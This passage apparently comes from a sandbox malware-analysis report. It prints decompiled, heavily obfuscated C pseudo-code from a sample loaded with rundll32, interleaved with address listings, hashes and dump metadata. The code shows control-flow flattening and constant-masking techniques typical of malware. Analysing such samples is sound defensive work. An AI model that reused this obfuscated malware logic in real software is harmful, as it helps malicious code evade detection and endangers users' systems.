				_v612 = _v612 | 0x64dab874;
				_v612 = _v612 >> 0xe;
				_v612 = _v612 ^ 0x0006f9eb;
				_v604 = 0xb7de18;
				_t344 = 0x48;
				_v604 = _v604 * 0x79;
				_v604 = _v604 * 0x31;
				_v604 = _v604 ^ 0xa26ee4e9;
				_v640 = 0x553c00;
				_v640 = _v640 + 0xffff4196;
				_v640 = _v640 + 0xffff8daf;
				_v640 = _v640 ^ 0x00577a07;
				_v576 = 0xaac37;
				_v576 = _v576 * 0x77;
				_v576 = _v576 ^ 0x04fc3a71;
				_v676 = 0xb6ce7b;
				_v676 = _v676 >> 1;
				_v676 = _v676 * 0x28;
				_v676 = _v676 >> 0xb;
				_v676 = _v676 ^ 0x000b20b4;
				_v584 = 0x4877b4;
				_v584 = _v584 << 1;
				_v584 = _v584 ^ 0x009148e9;
				_v588 = 0xaf1c90;
				_v588 = _v588 * 0x5b;
				_v588 = _v588 ^ 0x3e3937c6;
				_v644 = 0x150bb3;
				_v644 = _v644 + 0x865c;
				_v644 = _v644 + 0x5404;
				_v644 = _v644 ^ 0x001dce65;
				_v648 = 0xaa3958;
				_v648 = _v648 / _t344;
				_v648 = _v648 >> 0xe;
				_v648 = _v648 ^ 0x000a9525;
				_v596 = 0xdb2add;
				_v596 = _v596 << 0xd;
				_v596 = _v596 ^ 0x65528fd4;
				_v680 = 0xd04d0c;
				_v680 = _v680 << 5;
				_t340 = _v596;
				_v680 = _v680 * 0x55;
				_v680 = _v680 | 0x96843ebb;
				_v680 = _v680 ^ 0xb7be4a39;
				_v656 = 0x2591b4;
				_v656 = _v656 ^ 0x7517a4f1;
				_v656 = _v656 ^ 0xb20365ef;
				_v656 = _v656 + 0xffff4c4f;
				_v656 = _v656 ^ 0xc733773b;
				_v636 = 0xbfc674;
				_v636 = _v636 * 0x1d;
				_v636 = _v636 << 6;
				_v636 = _v636 ^ 0x6e5b8cbc;
				_v664 = 0x3235cc;
				_v664 = _v664 << 1;
				_v664 = _v664 | 0x857b9d7f;
				_v664 = _v664 * 0x28;
				_v664 = _v664 ^ 0xdbf98c50;
				_v672 = 0xb181ad;
				_v672 = _v672 >> 0xa;
				_v672 = _v672 << 2;
				_v672 = _v672 ^ 0xdb7e6d02;
				_v672 = _v672 ^ 0xdb78e9e9;
				do {
					while(_t310 != 0x10c1a7f) {
						if(_t310 == 0x31db0c0) {
							_t311 = _v572;
							_t295 = _v568;
							_push(_t311);
							_v560 = _t295;
							_v552 = _t295;
							_v544 = _t295;
							_v536 = _t295;
							_v564 = _t311;
							_v556 = _t311;
							_v548 = _t311;
							_v540 = _t311;
							_v532 = _v628;
							_t297 = E00335DDD( &_v564, _t340, _v644, _v648, _t311, _v596, _v680);
							_t347 = _t347 + 0x18;
							__eflags = _t297;
							_t309 =  !=  ? 1 : _t309;
							_t310 = 0x48f7cbb;
							continue;
						} else {
							if(_t310 == 0x461819e) {
								_push(_v660);
								_push(_v608);
								_t298 = E0034DCF7(_v632, 0x331000, __eflags);
								_pop(_t317);
								_t299 =  *0x353e10; // 0x0
								_t334 =  *0x353e10; // 0x0
								E003347CE(_t334 + 0x23c, _v624, _t317, _v652, _v688, _t298, _t299 + 0x1c, _v600, _v580);
								E0033A8B0(_v612, _t298, _v604);
								_t347 = _t347 + 0x24;
								_t310 = 0xa22489e;
								continue;
							} else {
								if(_t310 == 0x48f7cbb) {
									E00341E67(_v656, _v636, _v664, _v672, _t340);
								} else {
									if(_t310 == 0xa22489e) {
										_t306 = E00338F65(_v640, _v576,  &_v524, _v676, 0, _t310, _v616, _v584, _v620, _v588, _t310, _v668);
										_t340 = _t306;
										_t347 = _t347 + 0x28;
										__eflags = _t306 - 0xffffffff;
										if(__eflags != 0) {
											_t310 = 0x31db0c0;
											continue;
										}
									} else {
										if(_t310 == 0xada6804) {
											_t310 = 0xcbcd90e;
											continue;
										} else {
											if(_t310 != 0xcbcd90e) {
												goto L15;
											} else {
												E0034C1EC(_v684, _v592,  &_v572);
												_t310 = 0x10c1a7f;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t309;
					}
					_v572 = _v572 - E0034ABD1();
					_t310 = 0x461819e;
					asm("sbb [esp+0x8c], edx");
					L15:
					__eflags = _t310 - 0x7e6efe8;
				} while (__eflags != 0);
				goto L18;
			}



























































                                                                                                                    0x00349600
                                                                                                                    0x0034960a
                                                                                                                    0x00349612
                                                                                                                    0x00349620
                                                                                                                    0x00349624
                                                                                                                    0x00349626
                                                                                                                    0x0034962e
                                                                                                                    0x00349636
                                                                                                                    0x00349645
                                                                                                                    0x00349648
                                                                                                                    0x00349651
                                                                                                                    0x00349655
                                                                                                                    0x0034965d
                                                                                                                    0x00349665
                                                                                                                    0x0034966d
                                                                                                                    0x00349672
                                                                                                                    0x0034967a
                                                                                                                    0x00349682
                                                                                                                    0x00349686
                                                                                                                    0x0034968b
                                                                                                                    0x00349693
                                                                                                                    0x0034969b
                                                                                                                    0x003496a0
                                                                                                                    0x003496a8
                                                                                                                    0x003496ad
                                                                                                                    0x003496b5
                                                                                                                    0x003496bd
                                                                                                                    0x003496c5
                                                                                                                    0x003496cd
                                                                                                                    0x003496dd
                                                                                                                    0x003496e1
                                                                                                                    0x003496e9
                                                                                                                    0x003496f1
                                                                                                                    0x003496f9
                                                                                                                    0x00349701
                                                                                                                    0x00349709
                                                                                                                    0x00349711
                                                                                                                    0x00349719
                                                                                                                    0x00349721
                                                                                                                    0x0034972d
                                                                                                                    0x00349732
                                                                                                                    0x00349738
                                                                                                                    0x00349740
                                                                                                                    0x00349748
                                                                                                                    0x00349755
                                                                                                                    0x00349756
                                                                                                                    0x0034975a
                                                                                                                    0x00349762
                                                                                                                    0x0034976a
                                                                                                                    0x00349775
                                                                                                                    0x00349779
                                                                                                                    0x00349781
                                                                                                                    0x00349789
                                                                                                                    0x0034978e
                                                                                                                    0x00349796
                                                                                                                    0x0034979e
                                                                                                                    0x003497a6
                                                                                                                    0x003497ae
                                                                                                                    0x003497b6
                                                                                                                    0x003497bb
                                                                                                                    0x003497c3
                                                                                                                    0x003497ce
                                                                                                                    0x003497db
                                                                                                                    0x003497eb
                                                                                                                    0x003497f3
                                                                                                                    0x003497fb
                                                                                                                    0x00349800
                                                                                                                    0x00349808
                                                                                                                    0x00349817
                                                                                                                    0x00349818
                                                                                                                    0x00349821
                                                                                                                    0x00349825
                                                                                                                    0x0034982d
                                                                                                                    0x00349835
                                                                                                                    0x0034983d
                                                                                                                    0x00349845
                                                                                                                    0x0034984d
                                                                                                                    0x00349860
                                                                                                                    0x00349867
                                                                                                                    0x00349872
                                                                                                                    0x0034987a
                                                                                                                    0x00349883
                                                                                                                    0x00349887
                                                                                                                    0x0034988c
                                                                                                                    0x00349894
                                                                                                                    0x0034989c
                                                                                                                    0x003498a0
                                                                                                                    0x003498a8
                                                                                                                    0x003498b5
                                                                                                                    0x003498b9
                                                                                                                    0x003498c1
                                                                                                                    0x003498c9
                                                                                                                    0x003498d1
                                                                                                                    0x003498d9
                                                                                                                    0x003498e1
                                                                                                                    0x003498ef
                                                                                                                    0x003498f3
                                                                                                                    0x003498f8
                                                                                                                    0x00349900
                                                                                                                    0x00349908
                                                                                                                    0x0034990d
                                                                                                                    0x00349915
                                                                                                                    0x0034991d
                                                                                                                    0x00349927
                                                                                                                    0x0034992b
                                                                                                                    0x0034992f
                                                                                                                    0x00349937
                                                                                                                    0x0034993f
                                                                                                                    0x00349947
                                                                                                                    0x0034994f
                                                                                                                    0x00349957
                                                                                                                    0x0034995f
                                                                                                                    0x00349967
                                                                                                                    0x00349974
                                                                                                                    0x00349978
                                                                                                                    0x0034997d
                                                                                                                    0x00349985
                                                                                                                    0x0034998d
                                                                                                                    0x00349991
                                                                                                                    0x0034999e
                                                                                                                    0x003499a2
                                                                                                                    0x003499aa
                                                                                                                    0x003499b2
                                                                                                                    0x003499b7
                                                                                                                    0x003499bc
                                                                                                                    0x003499c4
                                                                                                                    0x003499cc
                                                                                                                    0x003499cc
                                                                                                                    0x003499da
                                                                                                                    0x00349afd
                                                                                                                    0x00349b06
                                                                                                                    0x00349b0d
                                                                                                                    0x00349b0e
                                                                                                                    0x00349b15
                                                                                                                    0x00349b1c
                                                                                                                    0x00349b23
                                                                                                                    0x00349b32
                                                                                                                    0x00349b3d
                                                                                                                    0x00349b49
                                                                                                                    0x00349b54
                                                                                                                    0x00349b62
                                                                                                                    0x00349b69
                                                                                                                    0x00349b70
                                                                                                                    0x00349b74
                                                                                                                    0x00349b76
                                                                                                                    0x00349b79
                                                                                                                    0x00000000
                                                                                                                    0x003499e0
                                                                                                                    0x003499e6
                                                                                                                    0x00349a87
                                                                                                                    0x00349a90
                                                                                                                    0x00349a98
                                                                                                                    0x00349a9e
                                                                                                                    0x00349aac
                                                                                                                    0x00349ac3
                                                                                                                    0x00349ad6
                                                                                                                    0x00349aeb
                                                                                                                    0x00349af0
                                                                                                                    0x00349af3
                                                                                                                    0x00000000
                                                                                                                    0x003499ec
                                                                                                                    0x003499f2
                                                                                                                    0x00349bba
                                                                                                                    0x003499f8
                                                                                                                    0x003499fe
                                                                                                                    0x00349a6d
                                                                                                                    0x00349a72
                                                                                                                    0x00349a74
                                                                                                                    0x00349a77
                                                                                                                    0x00349a7a
                                                                                                                    0x00349a80
                                                                                                                    0x00000000
                                                                                                                    0x00349a80
                                                                                                                    0x00349a00
                                                                                                                    0x00349a06
                                                                                                                    0x00349a31
                                                                                                                    0x00000000
                                                                                                                    0x00349a08
                                                                                                                    0x00349a0e
                                                                                                                    0x00000000
                                                                                                                    0x00349a14
                                                                                                                    0x00349a24
                                                                                                                    0x00349a2a
                                                                                                                    0x00000000
                                                                                                                    0x00349a2a
                                                                                                                    0x00349a0e
                                                                                                                    0x00349a06
                                                                                                                    0x003499fe
                                                                                                                    0x003499f2
                                                                                                                    0x003499e6
                                                                                                                    0x00349bc5
                                                                                                                    0x00349bce
                                                                                                                    0x00349bce
                                                                                                                    0x00349b88
                                                                                                                    0x00349b8f
                                                                                                                    0x00349b94
                                                                                                                    0x00349b9b
                                                                                                                    0x00349b9b
                                                                                                                    0x00349b9b
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: HwP$QjTF
                                                                                                                    • API String ID: 0-4190319459
                                                                                                                    • Opcode ID: 0c8075fb2a241be7b7eb07256836c4d733172367cb5fd4d9d5111fe2288b43dc
                                                                                                                    • Instruction ID: 1d21527ff3a8d96ca9548ffa695ad76a03b85c38141d3724753a77243aff8485
                                                                                                                    • Opcode Fuzzy Hash: 0c8075fb2a241be7b7eb07256836c4d733172367cb5fd4d9d5111fe2288b43dc
                                                                                                                    • Instruction Fuzzy Hash: BAE11E714093819FD369CF25C58A61BBBE1FBC4748F208A1DF2968A260D7B59949CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00341889 Relevance: 2.8, Strings: 2, Instructions: 278COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 93%
                                                                                                                    			E00341889(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				short _v1564;
				intOrPtr _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _t323;
				signed int _t334;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				void* _t386;
				void* _t387;
				signed int* _t390;

				_t390 =  &_v1680;
				_v1568 = 0xdfec4c;
				_t386 = __ecx;
				_v1564 = 0;
				_t387 = 0xea1969c;
				_v1596 = 0xb94d4f;
				_v1596 = _v1596 >> 2;
				_v1596 = _v1596 ^ 0x002b88ba;
				_v1604 = 0x7820e8;
				_t9 =  &_v1604; // 0x7820e8
				_t337 = 0x3f;
				_v1604 =  *_t9 / _t337;
				_v1604 = _v1604 << 6;
				_v1604 = _v1604 ^ 0x0075b154;
				_v1676 = 0xd796f6;
				_v1676 = _v1676 << 7;
				_t338 = 0x1f;
				_v1676 = _v1676 / _t338;
				_v1676 = _v1676 | 0x34dfec15;
				_v1676 = _v1676 ^ 0x37fcd475;
				_v1580 = 0x701ced;
				_t339 = 0x3b;
				_v1580 = _v1580 / _t339;
				_v1580 = _v1580 ^ 0x000eda5b;
				_v1584 = 0x3864f;
				_v1584 = _v1584 | 0xebab6106;
				_v1584 = _v1584 ^ 0xeba3c8dc;
				_v1668 = 0x7d6229;
				_v1668 = _v1668 + 0x90f9;
				_t340 = 0x7d;
				_v1668 = _v1668 * 0xd;
				_v1668 = _v1668 + 0x17d6;
				_v1668 = _v1668 ^ 0x06671cb6;
				_v1652 = 0x8dafad;
				_v1652 = _v1652 + 0xffffa237;
				_v1652 = _v1652 / _t340;
				_v1652 = _v1652 ^ 0xeab94c45;
				_v1652 = _v1652 ^ 0xeabb4144;
				_v1620 = 0x364acf;
				_v1620 = _v1620 + 0xffffd559;
				_v1620 = _v1620 ^ 0x476b0832;
				_v1620 = _v1620 ^ 0x4757dcec;
				_v1660 = 0xdffac8;
				_v1660 = _v1660 | 0xd3f81aab;
				_t341 = 0xd;
				_v1660 = _v1660 / _t341;
				_v1660 = _v1660 + 0x2ca8;
				_v1660 = _v1660 ^ 0x10473906;
				_v1636 = 0xafa95;
				_v1636 = _v1636 | 0x12b9adda;
				_v1636 = _v1636 + 0xca30;
				_t342 = 0x24;
				_v1636 = _v1636 / _t342;
				_v1636 = _v1636 ^ 0x008bc8e6;
				_v1612 = 0xa1b06d;
				_v1612 = _v1612 ^ 0xd927b519;
				_t334 = 0x1c;
				_v1612 = _v1612 / _t334;
				_v1612 = _v1612 ^ 0x07c55aff;
				_v1628 = 0xe475d7;
				_v1628 = _v1628 + 0xf351;
				_v1628 = _v1628 >> 9;
				_v1628 = _v1628 ^ 0x000b149a;
				_v1644 = 0xc98f78;
				_v1644 = _v1644 + 0xa497;
				_v1644 = _v1644 + 0xab0a;
				_v1644 = _v1644 ^ 0x9916dffd;
				_v1644 = _v1644 ^ 0x99d32d23;
				_v1572 = 0xdb2c8b;
				_v1572 = _v1572 ^ 0xa2354bd4;
				_v1572 = _v1572 ^ 0xa2e9b3f6;
				_v1616 = 0x8ac290;
				_v1616 = _v1616 | 0xd6340cba;
				_t343 = 0x17;
				_v1616 = _v1616 / _t343;
				_v1616 = _v1616 ^ 0x095403ec;
				_v1624 = 0xc9b33;
				_v1624 = _v1624 | 0xadec2c36;
				_t344 = 0x23;
				_v1624 = _v1624 / _t344;
				_v1624 = _v1624 ^ 0x04f29945;
				_v1672 = 0xce6284;
				_t345 = 0x1b;
				_v1672 = _v1672 * 0x47;
				_v1672 = _v1672 >> 0xb;
				_v1672 = _v1672 | 0xab5418c0;
				_v1672 = _v1672 ^ 0xab589207;
				_v1680 = 0xfb4294;
				_v1680 = _v1680 * 0x56;
				_v1680 = _v1680 >> 0xe;
				_v1680 = _v1680 >> 4;
				_v1680 = _v1680 ^ 0x000a896c;
				_v1576 = 0xa0fe48;
				_v1576 = _v1576 / _t345;
				_v1576 = _v1576 ^ 0x000b8e8e;
				_v1608 = 0x915f33;
				_v1608 = _v1608 + 0xfa43;
				_v1608 = _v1608 >> 0xc;
				_v1608 = _v1608 ^ 0x000a30cc;
				_v1648 = 0x21b71b;
				_v1648 = _v1648 ^ 0x78ef874e;
				_v1648 = _v1648 | 0x9c246086;
				_v1648 = _v1648 * 0x4a;
				_v1648 = _v1648 ^ 0x1ce73be6;
				_v1592 = 0x926794;
				_v1592 = _v1592 + 0xffff6f6e;
				_v1592 = _v1592 ^ 0x009c0ed2;
				_v1656 = 0x919083;
				_v1656 = _v1656 / _t334;
				_v1656 = _v1656 >> 2;
				_t346 = 0x67;
				_v1656 = _v1656 / _t346;
				_v1656 = _v1656 ^ 0x0003c4fa;
				_v1664 = 0xb12839;
				_v1664 = _v1664 ^ 0xbcb8295e;
				_v1664 = _v1664 + 0xe70b;
				_v1664 = _v1664 + 0xffffbcc9;
				_v1664 = _v1664 ^ 0xbc0a928f;
				_v1600 = 0x37ff42;
				_v1600 = _v1600 + 0xffff03fd;
				_v1600 = _v1600 >> 3;
				_v1600 = _v1600 ^ 0x000f4750;
				_v1632 = 0xbb4856;
				_v1632 = _v1632 * 0x4e;
				_v1632 = _v1632 | 0xf74fdfff;
				_v1632 = _v1632 ^ 0xff54b7ec;
				_v1640 = 0x73c8d7;
				_v1640 = _v1640 * 0x56;
				_v1640 = _v1640 << 0xb;
				_v1640 = _v1640 >> 7;
				_v1640 = _v1640 ^ 0x005dc3ee;
				_v1588 = 0xe2f656;
				_t323 = _v1588 * 0x57;
				_v1588 = _t323;
				_v1588 = _v1588 ^ 0x4d200bca;
				while(_t387 != 0x5de06da) {
					if(_t387 == 0xea1969c) {
						_t387 = 0xfa9128f;
						continue;
					} else {
						_t395 = _t387 - 0xfa9128f;
						if(_t387 != 0xfa9128f) {
							L8:
							__eflags = _t387 - 0xa8e801c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E0034DA22(_v1596, _v1604, _t395, _v1676,  &_v1040, _t346, _v1580);
							 *((short*)(E0033B6CF( &_v1040, _v1584, _v1668, _v1652))) = 0;
							E00338969(_v1620,  &_v520, _t395, _v1660, _v1636);
							_push(_v1644);
							_push(_v1628);
							E003347CE( &_v1040, _v1572, _v1612, _v1616, _v1624, E0034DCF7(_v1612, 0x331328, _t395),  &_v520, _v1672, _v1680);
							E0033A8B0(_v1576, _t329, _v1608);
							_t346 = _v1648;
							_t323 = E0033EA99(_t346, _t386, _v1592, _v1656,  &_v1560, _v1664);
							_t390 =  &(_t390[0x17]);
							if(_t323 != 0) {
								_t387 = 0x5de06da;
								continue;
							}
						}
					}
					return _t323;
				}
				_push(_v1588);
				_push( &_v1560);
				_push(_t346);
				_push(0);
				_push(0);
				_push(_v1640);
				_t346 = _v1600;
				_push(0);
				_t323 = E0033AB87(_t346, _v1632, __eflags);
				_t390 =  &(_t390[7]);
				_t387 = 0xa8e801c;
				goto L8;
			}



















































                                                                                                                    0x00341889
                                                                                                                    0x0034188f
                                                                                                                    0x003418a1
                                                                                                                    0x003418a3
                                                                                                                    0x003418aa
                                                                                                                    0x003418af
                                                                                                                    0x003418b7
                                                                                                                    0x003418bc
                                                                                                                    0x003418c4
                                                                                                                    0x003418cc
                                                                                                                    0x003418d0
                                                                                                                    0x003418d5
                                                                                                                    0x003418db
                                                                                                                    0x003418e0
                                                                                                                    0x003418e8
                                                                                                                    0x003418f0
                                                                                                                    0x003418f9
                                                                                                                    0x003418fe
                                                                                                                    0x00341904
                                                                                                                    0x0034190c
                                                                                                                    0x00341914
                                                                                                                    0x00341920
                                                                                                                    0x00341925
                                                                                                                    0x0034192b
                                                                                                                    0x00341933
                                                                                                                    0x0034193b
                                                                                                                    0x00341943
                                                                                                                    0x0034194b
                                                                                                                    0x00341953
                                                                                                                    0x00341960
                                                                                                                    0x00341963
                                                                                                                    0x00341967
                                                                                                                    0x0034196f
                                                                                                                    0x00341977
                                                                                                                    0x0034197f
                                                                                                                    0x0034198f
                                                                                                                    0x00341993
                                                                                                                    0x0034199b
                                                                                                                    0x003419a3
                                                                                                                    0x003419ab
                                                                                                                    0x003419b3
                                                                                                                    0x003419bb
                                                                                                                    0x003419c3
                                                                                                                    0x003419cb
                                                                                                                    0x003419d7
                                                                                                                    0x003419dc
                                                                                                                    0x003419e2
                                                                                                                    0x003419ea
                                                                                                                    0x003419f2
                                                                                                                    0x003419fa
                                                                                                                    0x00341a02
                                                                                                                    0x00341a0e
                                                                                                                    0x00341a11
                                                                                                                    0x00341a15
                                                                                                                    0x00341a1f
                                                                                                                    0x00341a27
                                                                                                                    0x00341a35
                                                                                                                    0x00341a3a
                                                                                                                    0x00341a3e
                                                                                                                    0x00341a46
                                                                                                                    0x00341a4e
                                                                                                                    0x00341a56
                                                                                                                    0x00341a5b
                                                                                                                    0x00341a63
                                                                                                                    0x00341a6b
                                                                                                                    0x00341a73
                                                                                                                    0x00341a7b
                                                                                                                    0x00341a83
                                                                                                                    0x00341a8b
                                                                                                                    0x00341a93
                                                                                                                    0x00341a9b
                                                                                                                    0x00341aa3
                                                                                                                    0x00341aab
                                                                                                                    0x00341ab9
                                                                                                                    0x00341abe
                                                                                                                    0x00341ac2
                                                                                                                    0x00341aca
                                                                                                                    0x00341ad2
                                                                                                                    0x00341ae0
                                                                                                                    0x00341ae5
                                                                                                                    0x00341ae9
                                                                                                                    0x00341af1
                                                                                                                    0x00341b00
                                                                                                                    0x00341b01
                                                                                                                    0x00341b05
                                                                                                                    0x00341b0a
                                                                                                                    0x00341b12
                                                                                                                    0x00341b1a
                                                                                                                    0x00341b27
                                                                                                                    0x00341b2b
                                                                                                                    0x00341b30
                                                                                                                    0x00341b35
                                                                                                                    0x00341b3d
                                                                                                                    0x00341b4d
                                                                                                                    0x00341b51
                                                                                                                    0x00341b59
                                                                                                                    0x00341b61
                                                                                                                    0x00341b69
                                                                                                                    0x00341b6e
                                                                                                                    0x00341b76
                                                                                                                    0x00341b7e
                                                                                                                    0x00341b86
                                                                                                                    0x00341b93
                                                                                                                    0x00341b97
                                                                                                                    0x00341b9f
                                                                                                                    0x00341ba7
                                                                                                                    0x00341baf
                                                                                                                    0x00341bb7
                                                                                                                    0x00341bc5
                                                                                                                    0x00341bc9
                                                                                                                    0x00341bd6
                                                                                                                    0x00341bde
                                                                                                                    0x00341be2
                                                                                                                    0x00341bea
                                                                                                                    0x00341bf2
                                                                                                                    0x00341bfa
                                                                                                                    0x00341c02
                                                                                                                    0x00341c0a
                                                                                                                    0x00341c12
                                                                                                                    0x00341c1a
                                                                                                                    0x00341c22
                                                                                                                    0x00341c27
                                                                                                                    0x00341c2f
                                                                                                                    0x00341c3c
                                                                                                                    0x00341c40
                                                                                                                    0x00341c48
                                                                                                                    0x00341c50
                                                                                                                    0x00341c5d
                                                                                                                    0x00341c61
                                                                                                                    0x00341c66
                                                                                                                    0x00341c6b
                                                                                                                    0x00341c73
                                                                                                                    0x00341c7b
                                                                                                                    0x00341c80
                                                                                                                    0x00341c84
                                                                                                                    0x00341c8c
                                                                                                                    0x00341c9a
                                                                                                                    0x00341d93
                                                                                                                    0x00000000
                                                                                                                    0x00341ca0
                                                                                                                    0x00341ca0
                                                                                                                    0x00341ca6
                                                                                                                    0x00341dc6
                                                                                                                    0x00341dc6
                                                                                                                    0x00341dcc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00341cac
                                                                                                                    0x00341cc5
                                                                                                                    0x00341cf6
                                                                                                                    0x00341cfd
                                                                                                                    0x00341d02
                                                                                                                    0x00341d0b
                                                                                                                    0x00341d4c
                                                                                                                    0x00341d5e
                                                                                                                    0x00341d7c
                                                                                                                    0x00341d80
                                                                                                                    0x00341d85
                                                                                                                    0x00341d8a
                                                                                                                    0x00341d8c
                                                                                                                    0x00000000
                                                                                                                    0x00341d8c
                                                                                                                    0x00341d8a
                                                                                                                    0x00341ca6
                                                                                                                    0x00341ddc
                                                                                                                    0x00341ddc
                                                                                                                    0x00341d9d
                                                                                                                    0x00341da8
                                                                                                                    0x00341da9
                                                                                                                    0x00341daa
                                                                                                                    0x00341dab
                                                                                                                    0x00341dac
                                                                                                                    0x00341db4
                                                                                                                    0x00341db8
                                                                                                                    0x00341db9
                                                                                                                    0x00341dbe
                                                                                                                    0x00341dc1
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: )b}$ x
                                                                                                                    • API String ID: 0-2724122486
                                                                                                                    • Opcode ID: 7703182d4d2bc7296f7637d8deee2d0ed847d95c3543a1bf8ddd597c9c4a24f8
                                                                                                                    • Instruction ID: 38795143819862467de0f5300b5b0662472882747a21d90ad4270032e3d10414
                                                                                                                    • Opcode Fuzzy Hash: 7703182d4d2bc7296f7637d8deee2d0ed847d95c3543a1bf8ddd597c9c4a24f8
                                                                                                                    • Instruction Fuzzy Hash: CED1227150C3819FE368CF60C48A95BFBE2FBC5358F108A1DF2999A260D7B59949CF42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0034473C Relevance: 2.7, Strings: 2, Instructions: 233COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 99%
                                                                                                                    			E0034473C() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t218;
				signed int _t219;
				void* _t225;
				void* _t246;
				intOrPtr _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				intOrPtr _t258;
				intOrPtr* _t259;
				signed int _t260;
				signed int* _t261;

				_t261 =  &_v100;
				_v12 = 0xf244e3;
				_v8 = 0x291d6d;
				_t225 = 0x37f2dd7;
				_t251 = 0;
				_v4 = 0;
				_v68 = 0x555e8d;
				_v68 = _v68 + 0xfffff532;
				_v68 = _v68 | 0x235b50f0;
				_v68 = _v68 ^ 0x235e53ff;
				_v84 = 0xf72ec;
				_v84 = _v84 >> 7;
				_t252 = 0x19;
				_v84 = _v84 / _t252;
				_v84 = _v84 << 3;
				_v84 = _v84 ^ 0x000f09df;
				_v20 = 0xee8389;
				_t253 = 0x51;
				_v20 = _v20 * 0x29;
				_v20 = _v20 ^ 0x2635dc09;
				_v88 = 0xea545e;
				_t30 =  &_v88; // 0xea545e
				_v88 =  *_t30 / _t253;
				_t36 =  &_v88; // 0xea545e
				_t254 = 0x7a;
				_v88 =  *_t36 * 0x1c;
				_v88 = _v88 + 0xc9a8;
				_v88 = _v88 ^ 0x005db592;
				_v24 = 0x448750;
				_v24 = _v24 / _t254;
				_v24 = _v24 ^ 0x000cab3c;
				_v28 = 0x8cea36;
				_v28 = _v28 * 0x38;
				_v28 = _v28 ^ 0x1eda9ad9;
				_v100 = 0x8110ba;
				_v100 = _v100 + 0x3ab9;
				_v100 = _v100 ^ 0x336ca884;
				_v100 = _v100 + 0xffff8c66;
				_v100 = _v100 ^ 0x33e0711c;
				_v64 = 0x5ca85e;
				_v64 = _v64 >> 0x10;
				_v64 = _v64 * 0x4e;
				_v64 = _v64 ^ 0x000b11ab;
				_v44 = 0x2bb2b6;
				_v44 = _v44 | 0xbbfbcd5f;
				_v44 = _v44 ^ 0xbbf16182;
				_v72 = 0x855f4c;
				_v72 = _v72 ^ 0x87656771;
				_v72 = _v72 * 0x71;
				_v72 = _v72 ^ 0xf9f8e59a;
				_v96 = 0x938339;
				_v96 = _v96 << 8;
				_v96 = _v96 << 0xf;
				_v96 = _v96 ^ 0xcc040e17;
				_v96 = _v96 ^ 0x50841052;
				_v40 = 0xbe1d32;
				_v40 = _v40 + 0x9b9c;
				_v40 = _v40 ^ 0x00bc2d0e;
				_v56 = 0x9e5686;
				_v56 = _v56 + 0xffffd134;
				_v56 = _v56 + 0xffff1440;
				_v56 = _v56 ^ 0x0091c9b6;
				_v60 = 0xb7e614;
				_v60 = _v60 << 3;
				_v60 = _v60 >> 8;
				_v60 = _v60 ^ 0x00065aea;
				_v32 = 0x537989;
				_v32 = _v32 + 0xffff7fce;
				_v32 = _v32 ^ 0x005430a6;
				_v92 = 0x1586eb;
				_t255 = 0x27;
				_v92 = _v92 * 0x18;
				_v92 = _v92 >> 7;
				_v92 = _v92 * 0x26;
				_v92 = _v92 ^ 0x009f543a;
				_v52 = 0xc32f0b;
				_v52 = _v52 | 0xcd8d244f;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0cd427c3;
				_v36 = 0xd9cf6a;
				_v36 = _v36 / _t255;
				_v36 = _v36 ^ 0x000f5a1a;
				_v16 = 0xbb623f;
